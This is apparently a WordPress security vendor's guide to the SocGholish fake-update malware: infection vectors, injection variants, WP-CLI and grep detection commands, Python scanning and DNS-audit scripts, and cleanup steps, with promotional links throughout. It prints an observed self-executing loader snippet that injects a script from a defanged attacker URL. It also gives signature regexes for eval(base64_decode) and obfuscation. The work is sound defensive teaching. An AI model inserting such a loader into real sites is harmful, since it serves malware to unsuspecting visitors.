In June 2026, law enforcement agencies from four countries executed the single largest WordPress malware remediation in history. They removed backdoors from 14,971 WordPress sites. They dismantled 106 command-and-control servers. And they did it quietly — the data had been sealed inside a 3-year international criminal investigation.
The malware behind those 14,971 infections is called SocGholish. It had been operating undetected on those sites for up to three years. The site owners had no idea. Their visitors had no idea. That is exactly how SocGholish is designed to work.
This article is the technical deep-dive. It covers everything a WordPress site owner needs to know: what SocGholish is, how it infects sites, the six injection patterns to look for in your code, how to detect it using both automated scanners and manual WP-CLI commands, how to clean an infection step by step, and how to prevent it from coming back. For the news story about the Operation Endgame takedown that made this possible, read our Operation Endgame Season 3 advisory.
Table of Contents
- What Is SocGholish?
- What SocGholish Does to Your WordPress Site
- How SocGholish Infects WordPress Sites
- Common SocGholish Injection Patterns on WordPress
- How to Detect SocGholish on Your WordPress Site
- How to Clean a SocGholish Infection
- How to Prevent SocGholish Reinfection
- The Post-Operation-Endgame Threat Landscape
- Frequently Asked Questions
What Is SocGholish?
SocGholish — also tracked as FakeUpdates, DEV-0206, GOLD PRELUDE, Mustard Tempest, TA569, and UNC1543 — is a JavaScript malware framework that has been active since at least 2017. Its purpose is not to deface websites or steal data directly. Its purpose is to turn legitimate WordPress sites into malware distribution platforms.
Here is how it works: attackers compromise a WordPress site. They inject obfuscated JavaScript into the site’s pages. When a visitor lands on the site, the script triggers a fake browser update prompt — designed to look exactly like a legitimate Chrome, Firefox, or Edge update notification. If the visitor downloads and runs the “update,” they are actually installing malware that gives attackers remote access to their computer. That access is then sold or used to deploy ransomware, steal credentials, or move laterally through corporate networks.
The sites hosting these fake updates look completely normal. No defacement. No downtime. No warning in Google Search Console. The site owner sees a functioning WordPress site. Every visitor sees a malware trap.
SocGholish is linked to Evil Corp (also tracked as Indrik Spider), a Russian cybercriminal group sanctioned by the UK, US, and Australian governments. Evil Corp is also behind Zeus, Dridex, and multiple ransomware and money-laundering operations. Sixteen named individuals from Evil Corp currently appear on the EU Most Wanted list. PRODAFT has linked SocGholish to the SolarWinds supply chain attack, and Microsoft has identified it as a loader for other malware types used by Evil Corp.
The scale of the operation is staggering:
| Metric | Number | Source |
|---|---|---|
| Compromised WordPress instances | 1.44 million | Shadowserver (May 2023–May 2025) |
| Unique domains affected | 1.13 million | Shadowserver |
| Sites remediated in Operation Endgame | 14,971 | Dutch National Police (June 2026) |
| Email addresses exposed | 154,000 | Have I Been Pwned |
| Previously unseen passwords | 500,000+ | Have I Been Pwned |
| NDSW/NDSX detections (single year) | 110,000+ | Sucuri (2023) |
| Khutmhpx detections (single year) | 20,000+ | Sucuri (2023) |
What SocGholish Does to Your WordPress Site
Most WordPress malware leaves a visible trace. A defacement. A redirect. A Google warning. A hosting suspension. You know something is wrong because you can see it.
SocGholish leaves no trace visible to the site owner. Your site loads normally. Your admin panel works. Your plugins update. Google Search Console shows no security issues. And every visitor who lands on your site during the infection window is being served a fake browser update prompt designed to infect their computer.
Here is what happens to an infected site:
- Google Safe Browsing blacklisting. Once Google detects the malicious JavaScript, your site gets flagged with a “This site may harm your computer” warning. Every visitor using Chrome sees a red warning screen before they can access your site. Traffic drops to near zero. If this has already happened, see our guide on removing the Google Safe Browsing warning — but do not request a review until the infection is fully cleaned.
- Hosting provider suspension. Most hosting companies run automated malware scanners. When they detect SocGholish injections, they suspend the account or quarantine the site. Your site goes offline. Your email may go with it.
- Browser warnings for every visitor. Even before Google blacklists the site, Chrome, Firefox, and Edge may display warnings to visitors based on their own threat detection. Each warning costs you visitors, customers, and trust.
- SEO damage. Google may remove infected pages from search results entirely. Rankings that took years to build can disappear in days.
- Reputation damage. Visitors who get infected by malware served from your site do not blame SocGholish. They blame you. If you run an agency and a client’s site infects their customers, you may lose the client permanently.
- Your site becomes a weapon. You are not the victim SocGholish is designed to harm. Your visitors are. Your site is the delivery mechanism. You are unknowingly attacking the people who trust your website.
Send this to your developer or the person who manages your WordPress site. The detection commands and cleanup steps below are copy-paste ready. If you manage client sites, forward this to your clients. The DIY-vs-Pro decision framework will tell them whether they can handle cleanup themselves or need expert help.
How SocGholish Infects WordPress Sites
Compromise Methods
SocGholish operators gain access to WordPress sites through six primary vectors. Understanding how they get in is the first step to keeping them out.
- Password spraying and brute-force attacks. Automated tools guess common WordPress admin credentials — “admin” / “password,” the site name, the domain name. Once they find a working login, they have the keys.
- Leaked or reused credentials. Credentials exposed in other data breaches are tested against WordPress sites at scale. If your WordPress admin password is the same as your password on a compromised service, attackers already have it. The Operation Endgame dataset contained 1.4 million WordPress credentials — many of them harvested from unrelated breaches and reused by site owners.
- Plugin, theme, and core vulnerabilities. Unpatched software with known exploits is the most common entry point. SocGholish operators track vulnerability disclosures closely. By the time a patch is released, they are already scanning for unpatched sites.
- Credential-stealing malware on site owners’ computers. Keyloggers and infostealers capture FTP, cPanel, and WordPress credentials directly from the site owner’s machine. The attacker never needs to guess a password — they watch you type it.
- Third-party service exploitation. Compromised hosting panels, DNS providers, or registrar accounts give attackers control at a level above WordPress. They can modify files, change DNS records, or add subdomains without ever logging into WordPress itself.
- Domain Shadowing. Attackers gain access to the authoritative DNS provider or registrar for a legitimate domain, then quietly create malicious subdomains — update.example.com, cdn.example.com, static.example.com — that point to criminal infrastructure. Because the subdomains inherit the reputation of the legitimate domain, they bypass security filters. We cover the detection pattern for domain shadowing in the Injection Patterns section below.
How the Malware Spreads to Visitors
Once a WordPress site is compromised, the infection chain is fast and nearly invisible:
- Malicious JavaScript is injected into the site’s pages — typically at the bottom of .js files, at the top of HTML pages, or embedded in the active theme’s functions.php.
- A visitor lands on the infected site. The JavaScript fires.
- A fake browser update prompt appears — designed to look exactly like a legitimate Chrome, Firefox, or Edge update. The prompt warns of a “critical security update” and urges immediate action.
- The visitor downloads the “update” — actually a .zip or .js file containing malware.
- If executed, the malware connects to a Command and Control (C2) server. The C2 determines the victim’s environment and deploys secondary payloads: Remote Access Trojans (RATs), infostealers, Cobalt Strike beacons, or ransomware.
- The infected visitor’s computer is now under attacker control. The compromise of the WordPress site has successfully created a new victim — and the site owner never knew it happened.
Common SocGholish Injection Patterns on WordPress
SocGholish operators run affiliate programs that allow multiple criminal groups to use the same infrastructure. Different affiliates use different injection methods. The result: multiple malware campaigns, all serving the same SocGholish fake browser update payload. Understanding the variants helps you find them in your own code.
| Pattern | Where Found | What to Look For | Prevalence | Cleanup Difficulty |
|---|---|---|---|---|
| NDSW/NDSX | Bottom of .js files | if(ndsw===undefined) obfuscated JavaScript | 110K+ sites (2023) | High — can infect thousands of files |
| Khutmhpx | Top of web pages | Variable-named injections, Keitaro TDS URLs | 20K+ sites (2023) | Medium — multiple injections per page |
| Fake Plugins | /wp-content/plugins/ | Unknown plugins with legitimate-looking names | Unknown | Medium — delete plugin, audit for reinfection |
| functions.php | Active theme directory | Injected code blended with legitimate theme code | Unknown | Low–Medium — single file, but easy to miss |
| Domain Shadowing | DNS records | Unauthorized subdomains (update., cdn., static.) | Unknown | High — requires DNS/registrar access audit |
| 2024–2025 Trends | Various | Self-executing function pattern, known malicious domains | ~8,700 sites each (H1 2024) | Varies |
NDSW/NDSX Injections
The most prevalent SocGholish variant. In 2023 alone, Sucuri detected NDSW injections on over 110,000 sites. The obfuscated JavaScript begins with if(ndsw===undefined) and is typically found at the bottom of .js files on compromised sites.
NDSW uses a layered approach: malicious PHP files hide NDSX layers, which then fetch the SocGholish payload from a third-party server. This layering makes detection and removal more difficult. A single NDSW infection can spread across thousands of files on one site — each file becoming a separate instance of the malware.
If your site has NDSW/NDSX, a DIY manual cleanup is tricky. For a detailed step-by-step cleanup walkthrough specific to NDSW/NDSX infections — including how to identify layered NDSX payloads and verify complete removal — see our NDSW/NDSX JavaScript malware cleanup guide.
Khutmhpx Injections
The second most prevalent variant, named after a variable used in its injections. Sucuri detected khutmhpx on over 20,000 sites in 2023. Multiple khutmhpx injections are often found at the top of infected web pages — sometimes dozens on a single page. Some are duplicates; others use different domains and Keitaro TDS (Traffic Distribution System) URLs.
Khutmhpx sometimes redirects traffic through VexTrio, an additional obfuscation layer that makes tracing the infection chain more difficult. The main payload is SocGholish, but it is not the only payload — VexTrio can deliver additional malware alongside it.
Fake WordPress Plugins
Attackers with compromised admin credentials upload malicious plugins that appear legitimate but serve SocGholish payloads. These plugins often use names that mimic real, trusted plugins — a technique designed to survive casual inspection. Because the plugin persists until manually deleted, it survives theme changes and WordPress core updates. Deactivation is not enough. The plugin must be deleted entirely.
Theme functions.php Injections
Malicious code injected into the active WordPress theme’s functions.php file blends with legitimate theme code, making it harder to spot than a standalone malicious plugin. The injection survives until the theme is changed or the file is manually cleaned. If you switch themes without cleaning functions.php first, the infection remains in the old theme’s files — ready to reactivate if the theme is ever switched back.
Domain Shadowing Patterns
Earlier we covered how attackers gain DNS access through compromised registrars and hosting panels. Here we cover what domain shadowing looks like when you are inspecting your records.
Attackers create subdomains under your legitimate domain — update.yourdomain.com, cdn.yourdomain.com, static.yourdomain.com — that point to attacker-controlled servers. These subdomains host fake browser update pages that serve the SocGholish payload. Because the subdomains inherit the good reputation of your legitimate domain, they bypass security filters that would block a direct connection to a known-malicious IP.
Check your DNS records and hosting control panel for any subdomains you did not create. Pay special attention to A records and CNAME records pointing to IP addresses or hosts you do not control.
2024–2025 Trends
In the first five months of 2024, two particularly common injection domains were detected on approximately 8,700 sites each: aitcaid[.]com and marvin-occentus[.]net. Payload URLs followed patterns like /9659650c81ce1b984c58.js and /statistic/js/stat.js.
The payload loader uses a self-executing function pattern:
;(function(v,d,r,y,a,b){a=d.createElement(r);b=d.getElementsByTagName(r)[0];
a.async=1;a.src=y;b.parentNode.insertBefore(a,b);})
(window,document,'script','hxxps://pluralism.themancav[.]com/lbK9kO6Q3vnxkIeio4aRsueQh7L82d/o+dXbsug=');
Specific domain names and payload URLs change frequently. The patterns above were observed in 2024–2025. Current SocGholish campaigns may use different domains. The detection methods in the next section will catch current variants regardless of the specific domains they use.
How to Detect SocGholish on Your WordPress Site
The detection methods below are ordered from fastest to most thorough. If you want to check right now, start with method 1. If you need to be certain, work through all seven.
1. Automated Scan (Fastest)
Run a free WebScan. It detects known SocGholish signatures, NDSW/NDSX patterns, khutmhpx variables, malicious plugin files, unauthorized admin users, and domain shadowing evidence — typically in under 60 seconds. No installation required. Works for any public website, not just WordPress.
2. User Audit
Check for unauthorized WordPress admin accounts. Attackers frequently add backdoor administrator accounts that they can use to regain access after cleanup. Delete any user you do not recognize.
WP-CLI command:
wp user list --role=administrator --fields=ID,user_login,user_email,user_registered
Look for: usernames you do not recognize, email addresses that are not yours, accounts created recently that you did not add, or accounts with generic names like “admin,” “support,” “wordpress,” or “wp.”
3. Plugin Audit
Review every installed plugin. Delete anything you do not actively use. Deactivation is not enough — SocGholish plugins can remain dormant while deactivated and reactivate later. Delete them entirely.
WP-CLI command:
wp plugin list --status=active --fields=name,version,title
Also list inactive plugins:
wp plugin list --status=inactive --fields=name,version,title
Delete anything you do not recognize or no longer need:
wp plugin delete plugin-name
4. DNS Audit
Log into your DNS provider or hosting control panel. Review every DNS record — A records, CNAME records, and subdomains. Look for entries pointing to IP addresses or hosts you do not control. Pay special attention to subdomains like update, cdn, static, assets, or api that you did not create.
WP-CLI commands to check the site URL and home URL (verify they have not been modified):
wp option get siteurl
wp option get home
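The DNS review in this step, together with the domain shadowing indicators described in the Injection Patterns section, can be made mechanical: export the zone, then check every record against what you know you created. The following added example (written for this article, not a Malcure tool) parses a constructed zone export for a fictional example.com and flags subdomains you did not create, A/AAAA records outside the IP ranges you control, CNAMEs to hosts you do not trust, and, going one step beyond this section, nameserver records that differ from the ones you expect at your registrar. The hostnames, IP ranges and rogue entries are all invented.

```python
import ipaddress
import re

# One A/AAAA/CNAME/NS record per line, as in a zone-file export (or a control-panel
# CSV massaged into that shape); TTL and class are optional.
RECORD = re.compile(r"^(?P<name>\S+)\s+(?:\d+\s+)?(?:IN\s+)?(?P<type>A|AAAA|CNAME|NS)\s+(?P<target>\S+)$")


def parse_zone(text):
    """Return (name, type, target) tuples, lower-cased and without trailing dots."""
    records = []
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop comments and blank lines
        m = RECORD.match(line)
        if m:
            records.append((m["name"].rstrip(".").lower(), m["type"], m["target"].rstrip(".").lower()))
    return records


def audit_zone(records, zone, expected_names, owned_networks, trusted_cname_targets, expected_ns):
    """Flag records that do not match what the site owner believes the zone contains.

    expected_names: every hostname you created (apex included)
    owned_networks: CIDR ranges of hosts you control (your hosting provider's IPs)
    trusted_cname_targets: external hosts a CNAME may legitimately point to (a CDN you use)
    expected_ns: the nameservers your registrar should be delegating to
    """
    nets = [ipaddress.ip_network(n) for n in owned_networks]
    issues = []
    for name, rtype, target in records:
        if rtype == "NS" and name == zone:
            if target not in expected_ns:
                issues.append(("nameserver_changed", name, target))
            continue
        if name not in expected_names:
            issues.append(("unexpected_subdomain", name, f"{rtype} {target}"))
        if rtype in ("A", "AAAA"):
            ip = ipaddress.ip_address(target)
            if not any(ip in net for net in nets):  # an IPv6 address is never "in" an IPv4 range
                issues.append(("address_outside_owned_ranges", name, target))
        elif rtype == "CNAME":
            in_zone = target == zone or target.endswith("." + zone)
            trusted = any(target == t or target.endswith("." + t) for t in trusted_cname_targets)
            if not (in_zone or trusted):
                issues.append(("cname_to_untrusted_host", name, target))
    return issues


# Constructed zone export for a fictional example.com; the rogue-looking entries are invented.
SAMPLE_ZONE = """\
; example.com zone export (constructed sample)
example.com.          3600 IN NS    ns1.hosting-provider.test.
example.com.          3600 IN NS    ns1.attacker-dns.test.
example.com.          300  IN A     203.0.113.10
www.example.com.      300  IN CNAME example.com.
mail.example.com.     300  IN A     203.0.113.11
update.example.com.   300  IN A     198.51.100.77
cdn.example.com.      300  IN CNAME pages.rogue-host.test.
static.example.com.   300  IN AAAA  2001:db8::5
"""


def audit_sample():
    """Run the audit against the constructed zone with the owner's expected configuration."""
    return audit_zone(
        parse_zone(SAMPLE_ZONE),
        zone="example.com",
        expected_names={"example.com", "www.example.com", "mail.example.com"},
        owned_networks=["203.0.113.0/24"],
        trusted_cname_targets={"cdn.trusted-cdn.test"},
        expected_ns={"ns1.hosting-provider.test", "ns2.hosting-provider.test"},
    )
```

Every flagged record is something to confirm with whoever manages your hosting and registrar; the update, cdn and static entries in the sample are exactly the shape domain shadowing takes.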
5. Manual Code Inspection
Search your WordPress files for known SocGholish patterns. These grep commands will find the most common injection signatures:
grep -r "ndsw\|NDSX\|khutmhpx" wp-content/ --include="*.php" --include="*.js"
grep -r "eval(base64_decode" wp-content/ --include="*.php"
grep -r "wscript\|cscript\|\.js" wp-content/ --include="*.php"
Also check for unknown .js files loading from unfamiliar domains. Look for script tags with src attributes pointing to domains you do not own or recognize — especially domains ending in uncommon TLDs or using randomized subdomains.
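The grep commands above and the patterns catalogued in the Injection Patterns section can be folded into one scanner that walks wp-content, reports the file, line and rule for every hit, and also flags script tags loading from a host you have not allowlisted; the same scan_text function can be pointed at an exported database table, which covers the database inspection step as well. This is an added example written for this article, not Malcure's scanner or the WebScan service: the regexes, the .test hostnames and the sample files are constructed, and a hit is a prompt to inspect the file, not proof of infection.

```python
import os
import re
import tempfile
from collections import namedtuple
from urllib.parse import urlparse

# Indicator regexes written for this example from the injection patterns in the article.
SIGNATURES = {
    # NDSW/NDSX: obfuscated block opening with if(ndsw===undefined), or the NDSX layer marker
    "ndsw_ndsx": re.compile(r"if\s*\(\s*ndsw\s*===\s*undefined\s*\)|\bNDSX\b"),
    # khutmhpx: the variable name the variant is named after
    "khutmhpx": re.compile(r"\bkhutmhpx\b"),
    # PHP droppers that decode and eval a base64 blob
    "php_eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    # 2024-2025 loader: self-executing function that creates a <script> element and is
    # invoked as (window,document,'script',URL); the payload URL is captured as group 'url'
    "self_exec_loader": re.compile(
        r"\(function\s*\((?:\w+\s*,\s*)+\w+\)\s*\{[^}]*createElement[^}]*insertBefore[^}]*\}\s*\)"
        r"\s*\(\s*window\s*,\s*document\s*,\s*['\"]script['\"]\s*,\s*['\"](?P<url>[^'\"]+)['\"]"
    ),
    "js_obfuscation": re.compile(r"String\.fromCharCode|\batob\s*\("),
}
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
SCAN_EXTS = {".php", ".js", ".html", ".htm", ".sql"}
# source is a file path, or a label such as "db:wp_options" when scanning a table dump
Finding = namedtuple("Finding", "source line rule detail")


def host_of(url):
    """Hostname of an absolute http(s) or protocol-relative URL; None for relative paths."""
    if url.startswith("//"):
        url = "https:" + url
    parsed = urlparse(url)
    return parsed.hostname.lower() if parsed.scheme in ("http", "https") and parsed.hostname else None


def scan_text(text, source, allowed_hosts):
    """One Finding per indicator hit; allowed_hosts are hosts that may legitimately serve scripts."""
    findings = []
    for rule, rx in SIGNATURES.items():
        for m in rx.finditer(text):
            line = text.count("\n", 0, m.start()) + 1
            detail = m.group("url") if rule == "self_exec_loader" else m.group(0)[:60]
            findings.append(Finding(source, line, rule, detail))
    for m in SCRIPT_SRC.finditer(text):
        host = host_of(m.group(1))
        if host and host not in allowed_hosts:
            findings.append(Finding(source, text.count("\n", 0, m.start()) + 1, "external_script_src", host))
    return findings


def scan_tree(root, allowed_hosts):
    """Walk a wp-content style tree and scan every file whose extension is in SCAN_EXTS."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                findings.extend(scan_text(fh.read(), os.path.relpath(path, root), allowed_hosts))
    return findings


# Constructed sample tree standing in for an infected wp-content directory: the .test hosts
# are invented and the "obfuscated" code is inert; it only has to trip the signatures.
SAMPLES = {
    "plugins/wp-cache-helper/helper.js": "function a(){}\nif(ndsw===undefined){var x='inert';}\n",
    "themes/site/functions.php": "<?php\nadd_action('init', 'f');\neval(base64_decode('ZWNobyAxOw=='));\n",
    "themes/site/header.php": (
        "<script src='/wp-includes/js/jquery.js'></script>\n"
        "<script src='https://cdn.constructed-example.test/statistic/js/stat.js'></script>\n"
        ";(function(v,d,r,y,a,b){a=d.createElement(r);b=d.getElementsByTagName(r)[0];\n"
        "a.async=1;a.src=y;b.parentNode.insertBefore(a,b);})\n"
        "(window,document,'script','https://loader.constructed-example.test/x.js');\n"
    ),
    "plugins/clean-plugin/clean.js": "document.title = 'ok';\n",
}


def run_demo():
    """Write the samples to a temp dir, scan it, and return {rule: set(sources)}."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        findings = scan_tree(root, allowed_hosts={"example.com"})
    hits = {}
    for f in findings:
        hits.setdefault(f.rule, set()).add(f.source.replace(os.sep, "/"))
    return hits
```

On a real site, call scan_tree on wp-content with your own domain and CDNs in allowed_hosts, and feed the output of wp db export into scan_text to cover post content and wp_options.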
6. Database Inspection
SocGholish injections are not limited to files. Malicious JavaScript is often injected directly into the WordPress database — in post content, widget settings, theme options, and plugin configurations.
WP-CLI database search commands:
wp db search 'ndsw' --all-tables
wp db search 'khutmhpx' --all-tables
wp db search 'eval(base64_decode' --all-tables
Also search for common obfuscation patterns:
wp db search 'String.fromCharCode' --all-tables
wp db search 'atob(' --all-tables
Check the wp_options table for unauthorized entries:
wp db search 'script' wp_options
Database inspection is a differentiator that most competitors do not cover. Many WordPress malware scanners check files only. SocGholish can survive a file-only cleanup by persisting in the database. Always check both.
7. File Integrity Monitoring
Compare your current WordPress files against known-clean copies. WordPress core files can be verified against official checksums:
wp core verify-checksums
For themes and plugins, compare against fresh downloads from WordPress.org or the original developer. Any file that does not match the official version — especially .js files and .php files — should be inspected.
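For a theme or plugin, that comparison is a two-manifest diff: hash every file in the installed copy and in a freshly downloaded copy of the same version, then list what changed, what was added and what is missing, with .php and .js files first because an extra or altered code file is the typical injection. The example below is added for this article and is not WP-CLI or a Malcure tool; the plugin name, file contents and the appended stand-in for an injection are constructed.

```python
import hashlib
import os
import tempfile

# File types an attacker is most likely to touch; differences here are listed first
CODE_EXTS = {".php", ".js"}


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large assets do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest(root):
    """{relative path: sha256} for every file under root (paths normalised to '/')."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            out[os.path.relpath(path, root).replace(os.sep, "/")] = sha256_file(path)
    return out


def code_first(path):
    """Sort key: .php/.js paths sort before everything else, then alphabetically."""
    return (os.path.splitext(path)[1].lower() not in CODE_EXTS, path)


def compare_trees(live_root, reference_root):
    """Compare an installed plugin/theme against a fresh copy of the same version.

    Returns {"modified": [...], "added": [...], "missing": [...]}; "added" files that exist
    only on the server and "modified" code files are the ones to open first."""
    live, ref = manifest(live_root), manifest(reference_root)
    return {
        "modified": sorted((p for p in live if p in ref and live[p] != ref[p]), key=code_first),
        "added": sorted((p for p in live if p not in ref), key=code_first),
        "missing": sorted((p for p in ref if p not in live), key=code_first),
    }


# Constructed plugin "wp-cache-helper" 1.2.0: REFERENCE is the fresh download, LIVE the server copy
REFERENCE = {
    "wp-cache-helper.php": "<?php\n/* Plugin Name: WP Cache Helper\nVersion: 1.2.0 */\n",
    "assets/helper.js": "(function(){console.log('cache helper');})();\n",
    "readme.txt": "=== WP Cache Helper ===\nStable tag: 1.2.0\n",
}
LIVE = dict(REFERENCE)
LIVE["assets/helper.js"] += "if(ndsw===undefined){/* inert stand-in for an appended injection */}\n"
LIVE["assets/.cache.php"] = "<?php\n/* inert stand-in for a dropped file */\n"
del LIVE["readme.txt"]


def write_tree(root, files):
    """Materialise a {relative path: content} dict under root."""
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def run_demo():
    """Write both constructed trees to a temp dir and return the comparison report."""
    with tempfile.TemporaryDirectory() as tmp:
        live, ref = os.path.join(tmp, "live"), os.path.join(tmp, "reference")
        write_tree(live, LIVE)
        write_tree(ref, REFERENCE)
        return compare_trees(live, ref)
```

Run compare_trees against each installed plugin and theme directory with a matching unpacked download as the reference; a clean install returns three empty lists.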
The fastest way to check for all of these indicators at once: Run a free WebScan. It detects SocGholish signatures, unauthorized users, suspicious plugins, and domain shadowing evidence in under 60 seconds. If the scan finds anything, you will know exactly which detection method to follow up with.
How to Clean a SocGholish Infection
Follow these steps in order. The sequence matters: audit users before rotating credentials so you find backdoor accounts before you lock yourself out of the ability to find them. End with verification so you know the cleanup succeeded.
- Take the site offline. Put up a maintenance page to stop serving malware to visitors while you clean. Every minute the site stays live is another minute visitors are being exposed.
- Audit and remove malicious users. Check WordPress admin accounts, FTP accounts, database users, and hosting panel users. Delete any you do not recognize. Find the backdoors first — then lock them out.
- Change all credentials. WordPress admin password, database password, FTP/SFTP credentials, hosting control panel login, DNS/registrar account password — every access point. Use strong, unique passwords generated by a password manager. Do not reuse passwords across services.
- Enable multi-factor authentication. On every account that supports it. A leaked password alone should not be enough to access your site.
- Identify and remove injected code. Clean all infected files. NDSW/NDSX infections can affect thousands of files. If you have a verified clean backup from before the infection date, restore it. If not, use an automated scanner that can identify and remove malicious code across every file on the server.
- Remove malicious plugins. Delete any plugins you do not recognize. Deactivation is not enough. Delete them entirely — including the plugin directory under /wp-content/plugins/.
- Clean the database. Remove injected JavaScript from posts, pages, options, and user meta tables. Use the database inspection commands from the Detection section above to find malicious entries, then remove them.
- Delete unauthorized subdomains. Remove any rogue DNS records from your DNS provider or hosting control panel. If the attacker had registrar-level access, verify that your domain’s nameservers have not been changed.
- Update everything. WordPress core, all themes, all plugins — apply every available update. Attackers exploit known vulnerabilities. Patching closes those doors.
- Remove unused software. Delete inactive themes and plugins entirely. They are not harmless just because they are deactivated. They are unmonitored code with known or unknown vulnerabilities sitting on your server.
- Scan again. After cleanup, run a fresh scan to verify no residual malware remains. This is not optional. Do not assume the cleanup worked. Verify it.
Should You Do This Yourself or Call an Expert?
| You can DIY if… | You need an expert if… |
|---|---|
| Infection is confined to a few files | NDSW/NDSX has infected thousands of files |
| You have a verified clean backup from before the infection | No backup exists or the backup may also be infected |
| You are comfortable with WP-CLI and code inspection | You are not technical or do not have the time to do it right |
| No unauthorized admin accounts were found | Multiple backdoor accounts exist across WordPress, FTP, and database |
| The site is not business-critical | The site generates revenue or serves clients who depend on it |
If you are in the right column, our WordPress Malware Removal Service provides same-day expert cleanup with a full investigation report. You get a clean site, a documented remediation trail, and specific hardening recommendations — not just a deleted file and a hope that the problem is gone.
How to Prevent SocGholish Reinfection
- Use strong, unique passwords. A password manager with random generation for every account. No reuse. No patterns. No exceptions.
- Enable multi-factor authentication everywhere. WordPress, hosting control panel, DNS provider, email — every access point that supports MFA should have it turned on.
- Keep everything updated. Enable automatic updates for WordPress core. Schedule regular updates for plugins and themes. Check weekly.
- Remove unused software. Delete, do not deactivate. Inactive themes and plugins are attack surface with no benefit.
- Run regular malware scans. The Malcure Advanced Edition plugin provides scheduled forensic scanning of files and databases with checksum verification against official WordPress APIs. If your site is modified — by you, by a plugin update, or by an attacker — you will know.
- Monitor file integrity. Set up alerts for unexpected file changes. Any modification to a file you did not make yourself is a potential compromise.
- Deploy a web application firewall. A WAF blocks exploit attempts before they reach your site and virtually patches known vulnerabilities until you can update the affected software.
- Use least-privilege user accounts. Do not give administrator access to users who do not need it. A content editor does not need the ability to install plugins. A customer support account does not need to edit theme files.
- Monitor DNS records. Set up alerts for new subdomains or DNS changes. Domain shadowing is invisible unless you look for it.
- Check Have I Been Pwned periodically. Monitor your domain’s email addresses for credential leaks. A leaked password from an unrelated breach can become the key to your WordPress site. Check at haveibeenpwned.com.
Yes, steps 1–4 appear in the cleanup section too. That is intentional. After an infection, you do them because you must. For prevention, you do them because you should. The difference is urgency, not importance.
The Post-Operation-Endgame Threat Landscape
Operation Endgame Season 3 achieved something unprecedented: 106 servers dismantled, 14,971 WordPress sites cleaned, and a botnet disabled — all through coordinated international law enforcement action. It is the largest WordPress malware remediation in history and a proof of concept for public-private partnership at scale.
But it is not the end of the story.
Evil Corp, the criminal group behind SocGholish, is still operating. Sixteen named individuals remain on the EU Most Wanted list. The group has weathered disruptions before. After each previous season of Operation Endgame, malware operators adapted — new domains, new obfuscation techniques, new injection methods. Assume SocGholish will evolve. The specific infrastructure taken down in June 2026 is gone. The criminal organization that built it is not.
The 14,971 sites that were cleaned by law enforcement are now free of backdoors. But 1.4 million WordPress credentials were confirmed to be in criminal possession. Those credentials do not expire. They have been shared, sold, and archived. The sites they belong to may not be infected today, but the keys to those sites are out there. If you have not rotated your WordPress credentials since 2023, there is a non-trivial probability that your login is among those 1.4 million.
WordPress powers 43% of all websites on the internet. The attack surface is not going to shrink. What can change is how quickly site owners detect compromise, how systematically they rotate credentials, and how seriously they treat the mundane work of updates, user audits, and access control.
For the full story of the June 2026 takedown — the 3-year sealed investigation, the agencies involved, the victim notification pipeline, and what Dutch police, RCMP, and Shadowserver are urging site owners to do right now — read our Operation Endgame Season 3 advisory.
Frequently Asked Questions
What is SocGholish?
SocGholish is a JavaScript malware framework that compromises legitimate WordPress sites to serve fake browser update prompts to visitors. It has been active since at least 2017 and is linked to the Russian cybercriminal group Evil Corp. Victims who install the fake “update” download malware that gives attackers remote access to their systems — often leading to ransomware deployment.
How do I know if my site has SocGholish?
The fastest method is to run a free WebScan, which detects SocGholish signatures, unauthorized users, and suspicious plugins in under 60 seconds. For manual detection: check for unexpected JavaScript injections containing ndsw, NDSX, or khutmhpx; audit your WordPress user accounts for unknown administrators; review installed plugins for anything you do not recognize; and check your DNS records for unauthorized subdomains. Most SocGholish infections produce no visible symptoms — a clean-looking site is not necessarily a clean site.
How did SocGholish get on my WordPress site?
Through one of six primary vectors: brute-force password attacks, leaked or reused credentials (1.4 million WordPress credentials were confirmed in the Operation Endgame dataset), vulnerable plugins or themes, credential-stealing malware on the site owner’s computer, compromised hosting or DNS provider access, or domain shadowing (attackers creating malicious subdomains under your legitimate domain).
Can SocGholish be removed?
Yes. Automated scanners can detect and clean SocGholish infections. The 11-step cleanup procedure above covers the full remediation sequence: take the site offline, audit users, change credentials, enable MFA, remove injected code, delete malicious plugins, clean the database, remove unauthorized subdomains, update software, remove unused themes and plugins, and scan again to verify. Severe NDSW/NDSX infections that affect thousands of files typically require automated cleanup or professional malware removal. See the DIY-vs-Pro decision table above to determine which path fits your situation.
Is SocGholish still active after Operation Endgame?
The specific infrastructure — 106 servers and domains — was dismantled in June 2026. The botnet is disabled. But Evil Corp, the criminal group behind SocGholish, remains operational with sixteen named individuals on the EU Most Wanted list. Assume the malware framework will adapt with new domains, new obfuscation techniques, and new injection methods. The 1.4 million credential dataset may already be circulating among other criminal groups. The takedown removed the immediate threat. It did not remove the long-term risk. Read our Operation Endgame Season 3 advisory for the full story.
How is SocGholish different from other WordPress malware?
Most WordPress malware leaves a visible trace — a defacement, a redirect, a Google warning, a hosting suspension. SocGholish leaves no trace visible to the site owner. Your site looks normal. Your visitors see a fake browser update and get infected. You may never know it happened unless a third party notifies you. That is what makes this malware dangerous, and that is why the Operation Endgame credential notification pipeline matters.
What is the difference between NDSW, NDSX, and khutmhpx?
